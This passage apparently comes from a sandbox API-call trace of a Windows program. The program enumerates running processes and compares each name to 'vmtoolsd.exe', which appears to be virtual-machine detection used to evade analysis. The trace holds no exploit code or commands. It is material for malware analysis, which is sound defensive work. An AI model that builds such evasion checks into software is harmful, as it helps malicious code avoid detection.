th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0121.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0121.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0121.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dwm.exe", cchCount1=7, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.806] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0121.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0121.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0121.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0121.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300dc8 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300dc8 | out: hHeap=0x12c0000) returned 1 [0121.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.809] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300e38 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300e38 | out: hHeap=0x12c0000) returned 1 [0121.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.813] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0121.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.816] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.817] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.818] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.822] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.823] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0121.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spoolsv.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.827] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0121.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sihost.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.829] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0121.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="explorer.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.831] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0121.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RuntimeBroker.exe", cchCount1=17, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.833] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.834] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0121.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ShellExperienceHost.exe", cchCount1=23, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.836] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0121.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SearchUI.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.837] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0121.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkypeHost.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.839] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0121.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dllhost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.840] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0121.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OfficeClickToRun.exe", cchCount1=20, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.842] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0121.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taskhostw.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.844] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.845] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0121.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WmiPrvSE.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.846] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0121.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMIADAP.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.847] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0121.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sppsvc.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.849] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0121.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WmiPrvSE.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.850] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0121.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iexplore.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.852] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0121.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.854] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, 